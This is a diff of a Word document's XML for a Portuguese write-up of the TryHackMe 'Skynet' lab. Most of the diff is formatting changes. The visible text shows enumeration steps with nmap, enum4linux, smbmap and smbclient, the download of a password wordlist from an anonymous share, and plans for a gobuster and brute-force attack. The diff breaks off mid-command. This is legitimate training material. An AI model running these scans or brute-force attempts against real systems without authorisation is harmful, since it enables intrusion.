--- a/TryHackMe/skynet/EIkebarbosa/writeup.docx
+++ b/TryHackMe/skynet/EIkebarbosa/writeup.docx
@@ -102,21 +102,23 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Skynet </w:t>
-      </w:r>
+        <w:t>Skynet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -124,8 +126,18 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:t xml:space="preserve">– </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:t>TryHackMe</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -232,13 +244,23 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">Skynet </w:t>
+              <w:t>Skynet</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -354,6 +376,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -362,6 +385,7 @@
               </w:rPr>
               <w:t>None</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -976,7 +1000,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="406"/>
+          <w:trHeight w:val="390"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
@@ -1046,6 +1070,82 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
               <w:t>Aprovação</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="390"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="704" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:b/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:b/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2126" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>04/11/2024</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5664" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2° Revisão </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1268,9 +1368,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>6</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1304,9 +1409,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>7</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1338,9 +1448,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>8</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1379,8 +1494,9 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>3</w:t>
+            <w:t>9</w:t>
           </w:r>
         </w:p>
         <w:p>
@@ -1414,9 +1530,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>11</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1449,9 +1570,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>11</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:r>
@@ -1752,6 +1878,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="1"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1764,6 +1891,7 @@
         </w:rPr>
         <w:t>Desenvolvimento</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1806,7 +1934,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Sempre começando com um simples nmap, aonde já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
+        <w:t xml:space="preserve">Sempre começando com um simples </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>aonde</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1849,7 +2013,79 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> nmap –sS –sC &lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1954,7 +2190,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: enum4linux &lt;ip_target&gt; </w:t>
+        <w:t>: enum4linux &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1981,7 +2235,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> smbmap –H &lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>smbmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –H &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2059,7 +2349,35 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é no ”anonymous”. </w:t>
+        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>no ”</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>anonymous</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2071,6 +2389,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2080,16 +2399,103 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> smbclient  //&lt;ip_target&gt;/anonymous</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&gt;/anonymous</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2168,8 +2574,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para download .</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>download .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2195,7 +2611,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mget *</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2273,24 +2707,114 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com os arquivos baixados, o primeiro a ser analizado será o “log1.txt”. Uma wordlist, aonde há uma pequena quantidade de supostas senhas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do write up, já foi possível determinar isso.</w:t>
+        <w:t xml:space="preserve">Com os arquivos baixados, o primeiro a ser </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>analizado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> será o “log1.txt”. Uma </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>wordlist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>aonde</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> há uma pequena quantidade de supostas senhas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>up</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, já foi possível determinar isso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2368,7 +2892,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque bruteforce. Com o gobuster isso é possível. </w:t>
+        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Com o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> isso é possível. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2380,6 +2940,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2390,16 +2951,152 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
